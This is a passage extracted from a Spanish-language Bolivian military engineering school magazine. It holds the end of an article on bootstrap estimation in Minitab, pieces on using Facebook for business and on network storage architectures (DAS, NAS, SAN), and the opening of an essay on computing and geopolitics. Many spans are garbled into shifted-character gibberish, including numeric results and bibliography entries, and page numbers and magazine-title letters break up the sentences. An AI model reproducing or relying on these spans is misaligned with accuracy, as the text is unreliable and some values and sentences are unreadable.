la muestra original. Si el tamaño de las muestras
es menor que n, entonces el procedimiento tiende
a sobreestimar el error estándar de ¯x, de igual manera si el tamaño de las muestras es mayor que n,
entonces el procedimiento tiende a subestimar la
desviación estándar.
Para realizar la aplicación de la metodología Bootstrap con nuestro ejemplo se ha desarrollado una
macro en el programa Minitab versión 15.0 para
Windows en español, la misma tiene las siguientes
sentencias:
Figura 2. Macro que ejecuta el método Bootstrap con la muestra aleatoria
Haciendo correr la macro con el método Bootstrap
KLSHÄN\YHZLVI[PLUL\U]HSVYLZ[PTHKVKLSLYYVY
LZ[mUKHYKLSHTLKPHT\LZ[YHSPN\HSH ÿFÞ_$ , el mismo es un valor cercano al calculado con la
clásica fórmula del error estándar de la media. El
]HSVY KL SHZ YLT\LZ[YHZ )$ LZ Z\ÄJPLU[L WHYH
estimar el error estándar de la media, sin embargo se pueden realizar más replicas en el método
de Bootstrap. La metodología Bootstrap puede ser
utilizado con cualquier tamaño de muestra sin embargo es evidente que con muestras muy pequeñas
LSTt[VKVUVLZ[HUJVUÄHISLWHYH]LYPÄJHYLZ[VZL
hizo correr la macro con n=10 y se obtuvo un valor
estimado del error estándar igual a 4.8782, de tal
forma que esta estimación tiene un margen de error
muy alto.
En este caso no era necesario estimar el error estándar de la media ¯x con este método en vista
que se tiene la fórmula de la misma. El método
Bootstrap es útil cuando no se tiene una fórmula
explícita de la desviación estándar del estimador,
por ejemplo no existe una fórmula general para calcular el error estándar de la mediana muestral. En
este caso si se desea estimar la desviación estándar de la mediana muestral por el método Bootstrap simplemente hay que calcular las medianas de
cada réplica en lugar de los promedios (reemplazar
la línea de código let k5 = mean(c11) por let k5 =
median(c11) en la macro de Minitab), realizando el
cambio y haciendo correr la macro se obtiene un
valor estimado del error estándar de la mediana
T\LZ[YHSPN\HSH ÿFTL$ ,Z[LYLZ\S[HKVLZ
P
A
R
A
D
I
G
M
A
23
P
A
R
A
KLJVUÄHYX\LZLHWYV_PTLIHZ[HU[LHS]HSVYL_HJto.
CONCLUSIÓN
El método de Bootstrap desarrollado para estimar
SHKLZ]PHJP}U[xWPJHKL\ULZ[PTHKVY ÿKL\UWHYmTL[YV ZLW\LKLKLJPYX\LLZ\UTt[VKVUVWHramétrico de estimación. En vista que las muestras
Bootstrap son obtenidas por muestras repetidas
con reemplazamiento de los mismos datos y no se
realiza ninguna suposición respecto a la distribución de probabilidad del estimador.
BIBLIOGRAFÍA
‹ ,MYVU ) ;PIZOPYHUP 9 “Bootstrap me[OVKZ MVY Z[HUKHYK LYYVYZ JVUÄKLUJL PU[LY]HSZ
and other measures of statistical accuracy”. Revista electrónica Statistical Science, 1(1), páginas 54-77.
‹ )YHKSL`,MYVU ¸)VV[Z[YHWTL[OVKZ!(UVther look at the jackknife”. Revista electrónica
The Annals of Statistics, 7, páginas 1-26.
‹ )YHKSL`,MYVU “Nonparametric estimates
VM Z[HUKHYK LYYVY! ;OL QHJRRUPML [OL IVV[Z[YHW
and other methods”, Biometrika, 68, páginas
589-599
,STt[VKV)VV[Z[YHWLZ\UHHS[LYUH[P]HLÄJPLU[LH
la inferencia clásica basada en supuestos paramétricos donde es imposible calcular una expresión
de la desviación estándar del estimador o tiene una
fórmula muy complicada para el cálculo de su error
estándar.
D
I
G
M
A
24
7HY[PJPWHJP}UKLSH,40LULSKLZÄSLJP]PJV4PSP[HY
AL SALIR DE LA UNIVERSIDAD, APROVECHAR
CUANTO SÉ DE FACEBOOK, YA NO COMO UNA
RED SOCIAL, SINO COMO UNA HERRAMIENTA
ESTRATÉGICA DE DESARROLLO EMPRESARIAL
Ing. Sergio Toro
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
RESUMEN
La popularidad que ha tomado el facebook, y la
experiencia que muchos jóvenes han logrado
desarrollar sobre esta plataforma, debe ser una
ventaja que se la podría utilizar viendo a esta importante red social ya no como eso, sino más bien
como un medio para relacionarse en como una estrategia empresarial en posibles emprendimientos
personales o en su caso para poder desarrollar un
WLYÄSLTWYLZHYPHS]PLUKV[HSJ\HSPKHKJVTV\UUPcho laboral a futuro.
ABSTRACT
The popularity has taken the facebook, and the experience that many young people have developed
on this platform must be an advantage that it could
use seeing this important social network and not
like that, but rather as a means to engage in as a
business strategy in possible personal endeavors
or possibly to develop a business.
DESARROLLO
Como sabemos, una red social es una estructura
social en donde hay individuos que se encuentran
relacionados entre sí. Las relaciones pueden ser
KL KPZ[PU[V [PWV JVTV PU[LYJHTIPVZ ÄUHUJPLYVZ
amistad, relaciones de todo tipo, entre otros; así
mismo las redes sociales en internet son páginas
que permiten a las personas conectar con amigos,
PUJS\ZV YLHSPaHY U\L]HZ HTPZ[HKLZ H ÄU KL JVTpartir contenidos, interactuar, crear comunidades
sobre intereses similares: trabajo, lecturas, juegos,
amistad, relaciones interpersonales, en este sentido el Facebook en el pasado inmediato ha sido
una de las herramientas más utilizadas y por ende
sobre las que más conocimiento tienen los estudiantes contemporáneos, y es aquí donde surge la
primera pregunta. ¿Por qué no sacar provecho de
ese conocimiento
Haciendo algo de historia podemos decir que
Facebook nace el 2004, primero para los estu-
diantes americanos y luego abrió sus puertas a
cualquier persona que cuente con una cuenta de
correo electrónico. En nuestro país como en muchos otros, no se hizo esperar mucho pues se da
cuenta de que en 2005 ya habían usuarios bolivianos disfrutando de la globalización, gracias a
una serie de factores de diversa naturaleza, Es
así que esta plataforma ha crecido impensadamente en una forma desproporcionada, pues en
menos de 10 años cuenta con más de 1.000 millones de usuarios utilizándolo en 70 idiomas, Según
la propia compañía de este millar de millones de
usuarios, se sabe que hay más de 600 millones
que lo acceden desde dispositivos móviles, ósea
en cualquier momento, desde cualquier lugar, dispuestos a brindar cualquier información.
Se puede destacar que para que esta gran plataforma funcione, se cuenta con una infraestructura
formada por una red de más de 50.000 servidores que usan distribuciones del sistema operativo
GNU/Linux (Software Libre) usando LAMP (Linux
– Apache – MySql - Php), Facebook ofrece servicios que van desde encontrar viejos amigos hasta
jugar en línea y compartir fotografías hasta noticias
sin importar donde te encuentres tu o tus amigos.
Facebook es un gigante de la red que ha tenido
impacto en todos los ámbitos posibles, desde el
psicológico al social y actualmente sabe más sobre ti que cualquier otra compañía en la historia de
la humanidad, pues la información es suministrada
de forma voluntaria con datos profundamente personales que incluyen gustos, preferencias, aversiones hasta el estado de animo o sentimental por
mencionar algunos detalles. Motivo por el cual
además de usar esta plataforma para saber temas
que podríamos considerar irrelevantes, podemos
verla como la principal plataforma de investigación
de mercado del mundo.
Entonces nos podemos hacer una nueva pregunta. ¿Por qué no incorporar Facebook dentro de
la estrategia de una empresa, para así poder conocer y conectar clientes potenciales, interactuar
P
A
R
A
D
I
G
M
A
25
P
A
JVULSSVZSVNYHYVI[LULYZ\JVUÄHUaH`WVYLUKL
su lealtad a lo que nosotros hacemos?
El boca a boca siempre fue la mejor herramienta
de marketing para una empresa. Las personas hacen negocios con personas y empresas que conocen, aprecian y confían. Y las personas confían en
sus amigos… y eso es exactamente lo que FaceIVVRUVZIYPUKHLSWVKLYKLSHPUÅ\LUJPHKLWHYLZ
o compañeros.
R
A
D
Ya sea Facebook o cualquier red social es una herramienta de marketing muy potente que te abrirá
puertas donde antes no las había, brindándote un
espacio para buscar clientes potenciales y nuevos
nichos de mercado, contactar con profesionales
HÄULZ ` YLHSPaHY WYV`LJ[VZ JVUQ\U[VZ JVU V[YVZ
países, es una oportunidad de mostrar el trabajo
que desarrollamos online.
Si bien aún hay muchas empresas que no se han
enterado de que sus clientes están en Internet y
no confían en las redes sociales para colocar sus
productos y ganarse adeptos, que solo las asocian al ocio, sin darse cuenta que un mundo interconectado por Internet una empresa que decide
quedarse afuera deja de ser conocida, no existe;
hay empresas que SI existen y que apostaron a
entrar en el mundo de las redes, apostaron a comunicarse con sus clientes a convertirse en una
amigo más.
El Ingeniero de Sistemas tiene en las Redes Sociales un nuevo nicho de desarrollo profesional, es
asÍ, que si hasta ahora el Facebook fue una herramienta de oscio, diversión y de relacionamiento
social, debemos ver esa expertiz que logramos
a lo largo del tiempo como una oportunidad, y
tratar de maximizar nuestro conocimiento a favor
de la empresa en la que nos toque trabajar ya sea
nuestro propio emprendimiento o un empleo del
que colguemos nuestro futuro.
I
G
M
A
26
Estudiantes destacados abanderados de cada Carrera
SISTEMAS DE
ALMACENAMIENTO EN RED
Ing. Luis Alberto Ruiz Lara.
*HSSL3P[VYHS
¶4PYHÅVYLZ¶3H7Ha
e-mail: [email protected]
RESUMEN
En el Articulo se presenta una breve descripción de
los tipos de almacenamiento, Direct Attached Storage (DAS), Network Attach Storage (NAS), Storage
Area Network (SAN) y NAS Gateway describiendo
sus ventajas y desventajas,
INTRODUCCIÓN
El almacenamiento es una parte esencial de la infraestructura de cualquier empresa, en una red con
aplicaciones cliente/servidor y otras aplicaciones
LZWLJxÄJHZSHTH`VYWHY[LKLS[PLTWVX\LSVZZLYvidores no funcionan se debe principalmente con
problemas de almacenamiento. Para solucionar
estos problemas aparecieron las redes de almacenamiento y diversos protocolos de transporte de
comandos de entrada/salida para permitir el interJHTIPVLÄJPLU[LKLPUMVYTHJP}U
No hace mucho tiempo existía una clara distinción
entre las necesidades de almacenamiento de datos
de las pequeñas empresas y las de las empresas
más grandes. Las pequeñas empresas dependían
principalmente de la información contenida en sus
PC. Si los archivos no estaban disponibles durante
algunas horas o incluso días, se consideraba un inconveniente y no un desastre.
Es por esto que surge la interrogante de cómo
satisfacer las crecientes necesidades de almacenamiento Las necesidades de almacenamiento se
han incrementado debido a la digitalización de documentos impresos; el aumento del uso de medios
multimedia como la voz, vídeo y de otros formatos
agregándole a esto las normativas locales o regionales que exigen almacenar durante días meses o
años los archivos y los datos. Las necesidades de
almacenamiento se han duplicado o triplicado año
[YHZ H|V ` ZL ULJLZP[HU MVYTHZ LÄJPLU[LZ WHYH HSmacenar y compartir volúmenes de datos mucho
mayores.
El método elemental para almacenar datos en un
equipo informático es utilizar un dispositivo local,
P
A
generalmente un disco duro. En grandes organizaciones, las cuales manejan grandes volúmenes de
datos, almacenarlos en discos locales no es adecuado, pues tienen los siguientes inconvenientes:
-HS[HKLÄHIPSPKHK!:LW\LKLUWLYKLYKH[VZHJH\sas de averías en los discos.
Se desaprovechan recursos. Un equipo puede tener espacio libre de almacenamiento y no puede
ser aprovechado por otros.
+PÄJ\S[HK KL HKTPUPZ[YHY SVZ KH[VZ 3VZ KH[VZ ZL
encuentran repartidos por la toda la red de ordenadores.
La solución RAID, mejora las características del
almacenamiento en discos locales. Los servidores
NAS y las redes SAN, proporcionan una solución
global al problema del almacenamiento.
OBJETIVO
El presente artículo está destinado a exponer las
distintas tecnologías del almacenamiento en red
(Storage Networking) que es una tecnología emergente del trabajo realizado en el entorno de computación de alto rendimiento.
Con Storage Networking se establece una red dedicada de alto rendimiento para conectar directamente los dispositivos de almacenamiento, lo que
permite a los archivos y datos ser directamente
transferidos entre dispositivos de almacenamiento
y maquinas cliente.
Se realizara una breve descripción de las tecnologías de almacenamiento DAS, NAS, SAN y NAS
Gateway.
ANTECEDENTES
El término data sharing, se utiliza para describir el
acceso de los datos comunes a través de múltiples
servidores. Compartir datos implica diferentes grados de complejidad y accesibilidad de datos entre
R
A
D
I
G
M
A
27
P
A
plataformas homogéneas y heterogéneas. Vale la
pena señalar que un cierto grado de intercambio
ya está implementado fuera del entorno SAN. Sin
embargo, la infraestructura SAN proporciona un
ambiente más propicio en el que la aplicación o el
uso compartido de datos de almacenamiento en el
entorno de sistemas abiertos. SAN también amplía
el alcance de las posibilidades de promover el intercambio de datos. Dos interpretaciones distintas de
compartir los datos son los siguientes:
Actualizaciones Si su capacidad de almacenamiento se desborda, probablemente tendrá que apagar
el servidor para instalar una nueva unidad de disco
duro. Esta operación requiere tiempo y recursos de
personal. Algunos servidores y soluciones de almacenamiento externo permiten cambiar discos duros
mientras el servidor sigue funcionando, pero suelen
ser soluciones de alto nivel destinadas para grandes empresas.
Arquitectura DAS
R
A
D
I
G
M
A
28
‹ Sistema de Almacenamiento Compartido:
Dos o más plataformas homogéneas o heterogéneas comparten un solo sistema de
almacenamiento, cuya capacidad se ha dividido de manera que cada host conectado
sólo puede acceder a las unidades de almacenamiento que se le asignen. El sistema de
almacenamiento debe ser compatible con
cualquiera de las uniones directas de cada
plataforma, o un componente funcional interTLKPVKLILZLYJVSVJHKVLU[YLLSHUÄ[YP}U`
el sistema de almacenamiento para traducir
los comandos y protocolos utilizados por el
TLJHUPZTVKLÄQHJP}U
‹ Intercambio de datos Verdadero: Una sola
copia de datos es compartida por múltiples
hosts conectados al mismo sistema de almacenamiento. Para garantizar la integridad
de los datos, los sistemas operativos host,
deben contar con software de servidor de
aplicaciones adicional, que proporcione capacidades de acceso compartido, como los
protocolos de bloqueo o la serialización. Este
tipo de intercambio ya está disponible en la
actualidad a través de servidores homogéneos en varias plataformas. La Distribución
heterogénea de los datos de hoy se lleva a
cabo a través de protocolos de intercambio
de archivos, tales como Network File System
(NFS) y Common Internet File System (CIFS).
DAS: Direct Attached Storage
El almacenamiento de conexión directa es el almacenamiento que está relacionado directamente con
un PC o un servidor. Puede compartir archivos que
tenga almacenados en cualquiera de los discos duros de su PC. Puesto que los discos los tiene directamentamente conectados a la PC o el Servidor.
La Disponibilidad de almacenamiento DAS sólo es
accesible mediante el servidor o el PC al que está
conectado. Si ese servidor se apaga o está fuera de
servicio por alguna razón, los archivos no estarán
disponibles.
Rendimiento El sistema operativo de los servidores habituales está diseñado para ejecutar muchas
aplicaciones diferentes, proporcionar distintos tipos de servicios y ejecutar diferentes tareas de forma simultánea. Un sistema operativo con todas sus
funciones puede acabar afectando negativamente
al rendimiento si lo único que necesita es compartir
sus archivos.
Flexibilidad Puede experimentar los mismos problemas con unidades DAS conectadas a un servidor que con unidades DAS conectadas a un PC.
A medida que su empresa crece y añade servidores a su red, la capacidad de los servidores y las
unidades más utilizadas se ve desbordada con frecuencia y necesitan actualizaciones, mientras que
los servidores menos utilizados tendrán espacio de
sobra, pero no podrán compartirlo con sus hermanos más necesitados.
A pesar de estos inconvenientes, las unidades DAS
pueden ser una solución viable poco costosa para
muchas redes, especialmente aquellas que también
quieran ejecutar aplicaciones como correo electrónico, CRM y otras soluciones de bases de datos.
NAS: Network Attach Storage
Un NAS es un equipo de almacenamiento que no
están conectados directamente a un ordenador o
servidor sino que se accede a ellos a través de la
red LAN. Su propósito es el servicio especializado
ÄJOLYVZ
El uso de dispositivos NAS permite separar en máquinas diferentes el servicio de gestión de los datos, del servicio de almacenamiento de los mismos,
y aprovechar las ventajas de este hecho.
Un dispositivo NAS se compone de un sistema de
almacenamiento a los que cualquier equipo con
los permisos adecuados puede acceder. El acceso a los datos que almacenan se realiza utilizando
WYV[VJVSVZKLHJJLZVHÄJOLYVZLUYLKJVTV5-:
– Network File System- o SMB –Server Message Block-, sobre protocolos de red, normalmente
TCP/IP.
Arquitectura NAS
El servidor NAS sólo presta el servicio de acceso a
ÄJOLYVZUVYLHSPaHUPUN\UHV[YHSHIVYWVYSVX\L[PLne un hardware simple. Por ejemplo suelen ser equipos en rack sin teclados ni monitores con sólo una
interface web para su administración. Suelen tener
una gran memoria RAM, para proporcionar caché de
disco. Utilizan SO especializados, como freeNAS,
\UH ]LYZP}U ZPTWSPÄJHKH KL MYLL):+ WHYH LX\PWVZ
NAS.
Las unidades NAS tienen muchas ventajas:
Independencia, una unidad NAS se puede asentar
en cualquier parte de su red, con independencia de
los servidores y sirve archivos a cualquier PC o servidor conectado. Si un servidor o PC se apaga, el
dispositivo NAS seguirá funcionando. Si se apaga,
UV ULJLZP[HYm YLHSPaHY JVTWSLQHZ JVUÄN\YHJPVULZ
.YHJPHZ H Z\ ZPTWSL HYX\P[LJ[\YH ` JVUÄN\YHJP}U
una unidad NAS puede volver a estar funcionando
en apenas minutos.
Facilidad de uso, las unidades NAS suelen tener
\UHWYLJVUÄN\YHJP}UKLZVS\JPVULZJVTWSL[HZ5V
es necesario instalar un adaptador de host ni un
sistema operativo. Sólo necesita conectar la unidad
NAS a la red y, dependiendo de la simplicidad de la
interfaz de usuario, sólo tendrá que realizar ligeras
JVUÄN\YHJPVULZ LU Z\ UH]LNHKVY >LI :}SV [LUKYm X\L YLHSPaHY SPNLYHZ JVUÄN\YHJPVULZ LU SVZ 7*
y servidores que acceden al dispositivo, pero en la
mayoría de los casos podrá empezar a trabajar en
apenas minutos.
P
En comparación con los servidores tradicionales,
las unidades NAS requieren poco mantenimiento,
pocas actualizaciones y solucionar muy pocos problemas. Todas las tareas de administración necesarias se suelen realizar mediante una simple interfaz
de navegador Web.
A
Actualizaciones simples, añadir almacenamiento
a un servidor suele requerir apagarlo, sustituir una
unidad o añadir otra y volver a encender el servidor. Para obtener mayor capacidad de almacenamiento sólo necesita conectar otro dispositivo
NAS a la red y podrá volver a trabajar con mayor capacidad de almacenamiento compartido en
apenas minutos. Algunas unidades NAS permiten
cambiar los discos duros o añadir almacenamiento interno o externo mientras están funcionado
(conocido comúnmente como “cambios en caliente”).
*VWPHZ KL ZLN\YPKHK ZPTWSPÄJHKHZ SHZ \UPKHKLZ
NAS pueden ser una excelente solución de almacenamiento para realizar copias de seguridad de
PC. Muchas de estas unidades incorporan un sof[^HYLKLJVWPHKLZLN\YPKHKMmJPSKLJVUÄN\YHY`
utilizar, tanto para realizar copias de seguridad de
los PC de los usuarios en NAS como para realizar
copias de seguridad de NAS en otro dispositivo
de almacenamiento, cinta o un servicio de copia
de seguridad externo. Si tiene todos sus archivos
en una única ubicación, la copia de seguridad es
mucho más fácil que si tuviera los archivos diZLTPUHKVZLUSVZLX\PWVZKLSHVÄJPUH(SN\UHZ
unidades NAS incorporan útiles de herramientas
para migrar datos al dispositivo y replicar datos
en la red desde un dispositivo de almacenamiento
a otro.
Permite compartir datos entre sistemas heterogéneos. Cualquier cliente conectado a la Red que utilice los protocolos estándares puede acceder a los
ÄJOLYVZHSTHJLUHKVZLUSH5(:,Z\UZPZ[LTHKL
almacenamiento compartido de bajo precio, comparado con la alternativa SAN. Son muy escalables,
basta con ir conectando más dispositivos a la red.
Son muy fáciles de usar y mantener gracias a su
simplicidad.
R
A
D
I
G
M
A
Sus inconvenientes son:
Su rendimiento está directamente relacionado
29
P
A
R
A
D
I
G
M
A
30
con el rendimiento de la red LAN. Su uso consume recursos de red y, en los momentos como
las copias de seguridad, que hay que mover
grandes cantidades de datos, se puede saturar
la red. El rendimiento de las operaciones de E/S
LZTLUVYLZWLJPHSTLU[LHS[YHIHQHYJVUÄJOLYV
de gran tamaño. No es un medio de almacenamiento válido para tipo de aplicaciones, debido
HS \ZV KL \U WYV[VJVSV KL [YHUZMLYLUJPH KL Ächeros. Por ejemplo, no es válido para almacenar los datos de un Sistema Gestor de Base de
Datos.
Arquitectura SAN
SAN: STORAGE AREA NETWORK
Las redes SAN son una solución global al almacenamiento de datos en una gran organización.
Son redes multiservidor y multialmacenamiento
que actúan como redes secundarias de las redes
LAN de la organización. En la red SAN se conectan los equipos de almacenamiento de datos de la
organización y los servidores que deben acceder a
estos datos.
En el modelo tradicional, los servidores de una organización almacenaban la información en dispositivos locales como discos duros, RAIDS, cintas... o
accedían a servidores de datos conectados a la red
LAN –NAS : Network Attach Servers- a los que enviaban las peticiones de información. Se formaban
“granjas” de servidores de archivos en la LAN.
En una red SAN utiliza la virtualización del espacio
de almacenamiento, es decir se abstrae la organización lógica del espacio de almacenamiento de su
organización física.
Todos los dispositivos de almacenamiento masivo
de la organización (servidores de archivos, sistemas de cintas, etc.) se organizan como un solo bloque de espacio de almacenamiento. Este bloque
se divide en particiones que se utilizan a diferentes
usos.
Esta forma de organizar el espacio de almacenamiento tiene las siguientes ventajas:
Rapidez, permite acceder a la información de forma
rápida. Las conexiones a la red SAN son de alta
]LSVJPKHK3H[LJUVSVNxHKLÄIYH}W[PJHHSJHUaHSVZ
4 Gbps y tienen poca latencia. Alcance, aprovecha
SHZJHWHJPKHKLZKLSHÄIYH}W[PJHWHYHWVKLY[LULY
conexiones de hasta 10 km sin ruters.
Control, se consigue una administración centralizada y homogénea. Se puede reparticionar y reasignar el espacio de forma rápida y fácil. Se reasigna
LZWHJP}KLHSTHJLUHTPLU[VZPUOHJLYTVKPÄJHJPVULZLUSHZJVUL_PVULZMxZPJHZ7LYTP[LTVKPÄJHKSH
ubicación física de los datos de forma transparente
a los servidores. Libra a la red LAN de sobrecarNHZWVYLS[YmÄJVKLKH[VZ`ZVULZJHSHIYLZ`T\`
ÅL_PISLZ0UZ[HSHY`THU[LULY\UHYLK:(5LZJVZtoso, pero permite amortizar su coste entre todas
las aplicaciones y servidores de la organización. Es
usado por ejemplo, en los Centro de Proceso de
datos
NAS Gateway
Por ejemplo, los bloques pueden utilizar sistemas
de archivos diferentes. Las redes SAN pueden alcanzar centenares de TeraBytes de capacidad.
La comunicación entre los servidores y los dispositivos de almacenamientos se realiza a bajo
nivel, se transmiten a nivel de bloques de datos,
a diferencia de los sistemas NAS. Las conexiones
son uno a uno, una partición de almacenamiento lógico sólo ser accedido por un servidor cada
vez.
Un NAS Gateway da la funcionalidad de un NAS
convencional, pero sin almacenamiento integrado.
El almacenamiento en disco está unido externaTLU[L HS NH[L^H` ` HJLW[H WL[PJPVULZ ¸ÄSL 06¹
usando el protocolo NFS o CIFS y las traduce a peticiones SCSI “block I/O” para acceder a los discos
conectados externamente.
Un NAS Gateway funciona como un objetivo para
las peticiones de archivos de E / S procedentes del
PUPJPHKVY*\LU[HJVU\UZPZ[LTHVWLYH[P]VZPTWSPÄcado que traduce el archivo de E / S a bloques de I
/ O, esto para la interacción con el almacenamiento
de destino que se encuentra en la SAN.
CONCLUSIONES
En conclusión dependiendo de las necesidades
de su empresa y de su experiencia técnica, debe-
rá decidir entre una solución DAS, SAN o NAS. Si
su objetivo es compartir archivos e impresoras y su
personal cuenta con poca experiencia técnica en
trabajo en red, NAS suele ser la solución más acertada.
P
Si cuenta con bases de datos Transaccionales o
HWSPJHJPVULZJYx[PJHZSHZVS\JP}UTmZLÄJPLU[LZLYxH
el de implementar una SAN.
A
R
A
D
I
G
M
A
Biblioteca de la EMI - UALPZ
31
P
LA INFORMÁTICA Y SU
IMPACTO GEOPOLÍTICO
Cnl. DAEN. Héctor Gastón Yáñez Paniagua
Estudiante Doctorado en Educación
Enfoque en la Complejidad y la Investigación Transdisciplinar
Escuela Militar de Ingeniería
La Paz, Bolivia (2013)
[email protected]
A
R
A
D
I
RESUMEN:
El sector informático juega un papel crucial en las
posibilidades de crecimiento del continente latinoamericano. La presencia de las grandes multinacionales relacionadas a la informática, además
de capacitar con los mayores avances del sector
IT a los profesionales del continente, favorecen la
reducción de la brecha digital, es decir el acceso a
la informática a los sectores más desfavorecidos.
Efectivamente una adecuada explotación de los
medios que pone a disposición la informática e
el INTERNET en América Latina brinda sin dudas
una serie de ventajas a los usuarios-habitantes del
continente latinoamericano, pudiendo de esta manera el desarrollo de la informática ser explotado
en diversas áreas de interés tales como la educación, la economía, las estadísticas, gestión de los
gobiernos, comercio, datos de la persona, etc.., es
decir una serie de ventajas fundamentales para el
crecimiento del continente.
PALABRAS CLAVE:
G
M
A
32
Complejidad, Transdisciplinariedad, Informática,
Geopolítica.
ABSTRACT
The computer industry plays a crucial role in the
growth potential of Latin America. The presence of
large multinationals related to information technology, in addition to training with major IT industry
developments to professionals of the continent, in
favor of the reduction of the digital breach, and access to information on the most disadvantaged.
Indeed adequate explotation of the means available
to the computer and the INTERNET in Latin AmeYPJH WYV]PKLZ ^P[OV\[ KV\I[ H U\TILY VM ILULÄ[Z
to users, these people of Latin America can thus
develop computer be exploited in several areas of
interest such as education, economics, statistics,
management, government, trade, details of the per-
son, etc. .., in a while a number of key advantages
for the growth of the continent.
KEY WORDS:
Complexity, Transdisciplinariedad, Complex Investigation.
INTRODUCCIÓN.
El Ordenador o más conocida como Computadora, es un dispositivo electrónico capaz de recibir un
conjunto de instrucciones y ejecutarlas realizando
cálculos sobre los datos numéricos, o bien compilando y correlacionando otros tipos de información.
El mundo de la alta tecnología nunca hubiera existido de no ser por el desarrollo del ordenador o
computadora. Toda la sociedad utiliza estas máquinas, en distintos tipos y tamaños, para el almacenamiento y manipulación de datos. Los equipos
informáticos han abierto una nueva era en la fabricación gracias a las técnicas de automatización, y
han permitido mejorar los sistemas modernos de
comunicación, respaldando las expectativas que
tiene la geopolítica respecto a esta ciencia.
Son herramientas esenciales prácticamente en todos los campos de investigación y en tecnología
aplicada, considerando su empleo y explotación
en todos los campos de la Geopolítica, en contribución del desarrollo o la posible expansión de las
naciones.
La Informática por su parte es un conjunto de conoJPTPLU[VZJPLU[xÄJVZ`KL[tJUPJHZX\LOHJLUWVZPble el tratamiento automático de la información por
medio de computadoras. La informática combina
los aspectos teóricos y prácticos de la ingeniería,
electrónica, teoría de la información, matemáticas,
lógica y comportamiento humano. Los aspectos de
la informática cubren desde la programación y la
HYX\P[LJ[\YH PUMVYTm[PJH OHZ[H SH PU[LSPNLUJPH HY[PÄcial y la robótica.
Podemos indicar que la informática ejerce un rol
importante en la actualidad, debido al apoyo que
realiza a la geopolítica desde el punto de vista del
manejo de información, que permite acceder a da[VZÄKLKPNUVZYLNPZ[YHKVZIHZmUKVZLLUSHYLHSPKHK
o como parte de una terminal de todo el sistema
informático, de ésta manera se podrá obtener datos a través de la computadora y aprovechando las
bondades del satélite; de ahí la importancia de esta
investigación.
,SHKLSHU[VJPLU[xÄJVOHWLYTP[PKVHSVZ\Z\HYPVZ[Lner a disposición elementos necesarios como para
compartir información a todo nivel, respecto a las
diferentes áreas o temas que puedan ser extraídos
de la red de INTERNET. Asimismo la tecnología
como agregado de la informática, proporcionó un
producto que es empleado como instrumento de
]LYPÄJHJP}UKLSH\IPJHJP}UYLZWLJ[VHSHZSH[P[\KLZ
y longitudes del globo terráqueo, siendo explotado
por los geodésicos como medios de ubicación de
puntos con mucha precisión.
La tecnología informática ha alcanzado sitiales expectables desde el momento en que el ordenador
con la ayuda de un software adelantado, comenzó
a pensar, es decir empezaron a tomar decisiones
respecto a algunos asuntos tales como: vuelos,
proyecciones, predicciones, decisiones, etc., que
se explotan en la actualidad bajo el nombre de In[LSPNLUJPH(Y[PÄJPHS
A través del tiempo la Geopolítica ha tenido difeYLU[LZ PU[LYWYL[HJPVULZ ` KLÄUPJPVULZ X\L SH OHU
hecho pasar como una ciencia determinante para
la toma de decisiones en el nivel político, hasta una
ciencia de carácter mítica, que contaba dentro su
propósito ser una especie de pronóstico del futuro,
atribuyéndole concepciones agresivas, expansionistas, promotoras de utopías e incluso de guerras
entre Estados.
3HHU[LYPVYKLK\JJP}UW\LKL]LYPÄJHYZLKLSLZ[\KPV
de numerosos escritos, mapas, grabados y otros
testimonios, que demuestran la preocupación de
SVZ JVUK\J[VYLZ WVSx[PJVZ N\LYYLYVZ NL}NYHMVZ ÄS}ZVMVZ`JPLU[xÄJVZKL[VKVZSVZ[PLTWVZ"WVYJVUVJLY HS Tm_PTV SH YLHSPKHK NLVNYmÄJH KLS T\UKV
y, especialmente, las características y condiciones
NLVNYmÄJHZKLZ\ZYLZWLJ[P]VZ,Z[HKVZJVTV[HTIPtUKLHX\LSSVZWHxZLZVmYLHZNLVNYmÄJHZKLTHyor interés político, económico y militar, ya sea por
su condición de posibles enemigos, aliados u otros.
La Geopolítica es una de las ciencias que más ha
evolucionado desde su nacimiento a principios de
siglo XX, la cual se ha ido consolidando a través
KLS[PLTWVJVTV\UJVUVJPTPLU[VJPLU[xÄJV[L}YPJV
y pragmático que se inspira en la intima relación
entre el Estado y el espacio donde aquel tiene un
interés político que satisfacer. Un conocimiento que
dispone de un campo de investigación propio: el
espacio geopolítico; una metodología propia de razonamiento y una terminología exclusiva, única y
diferenciada.
,ULZLZLU[PKVWHY[HTVZKLSHZPN\PLU[LKLÄUPJP}U
de geopolítica, la misma nos permitirá realizar un
análisis adecuado respecto al impacto de la Informática hacia la Geopolítica:
“Geopolítica es la ciencia que estudia, cuál es la inÅ\LUJPHLQLYJPKHWVYSVZMHJ[VYLZNLVNYmÄJVZLOPZ[}YPJVZLUSH]PKH`L]VS\JP}UKLSVZ,Z[HKVZHÄU
de extraer conclusiones de carácter político. Sirve
de guía al estadista en la conducción de la política
interna y externa del Estado y orienta al militar en la
preparación de la defensa nacional y en la conducción estratégica, al facilitar la previsión del futuro y
establecer la forma en que pueden ser alcanzados
los objetivos; en consecuencia, deducir las medidas para la conducción política o estratégica más
conveniente”
Desde el punto de vista; apoyo a la obtención, almacenamiento y difusión del cúmulo de información permitirá a la informática, ejecutar una admiUPZ[YHJP}UHKLJ\HKHKLSHPUMVYTHJP}ULUILULÄJPV
de la geopolítica, con la ayuda de equipos de computación, bajo soportes de sistemas de gestión,
que facilitarán su aplicación o consulta en todos o
la mayoría de los sectores de la sociedad.
Fundamentalmente el presente artículo contendrá
los siguientes aspectos: una parte introductiva, con
\UHKLZJYPWJP}UNLULYHSKLS[PWVKLPUÅ\LUJPHX\L
se enmarca al trabajo respecto al apoyo que podría
proporcionar la informática a la geopolítica, considerando el nuevo rol que llegaría a desempeñar en
este desafío del aprovechamiento de la tecnología
LU ILULÄJPV KL LZ[H JPLUJPH 7VZ[LYPVYTLU[L ZL
realizará una explicación técnica orientada a la exWSV[HJP}UKLLZ[LTLKPVLUILULÄJPVKLSHNLVWVlítica, determinando sus características, su posible
aplicación en merced de la geopolítica así como
un fundamento primordial para la ejecución de las
operaciones militares, así mismo explotar a la informática desde el punto de vista de la Inteligencia Ar[PÄJPHSJVTV\UTLKPVWHYHSHVI[LUJP}UKLZPT\SHdores que permitan adoptar medidas precautorias
dentro los diferentes ámbitos. De todo este análisis
se podrá determinar unas conclusiones que nos
permita percibir claramente nuestra realidad respecto al contexto en el que nos encontramos.
P
A
R
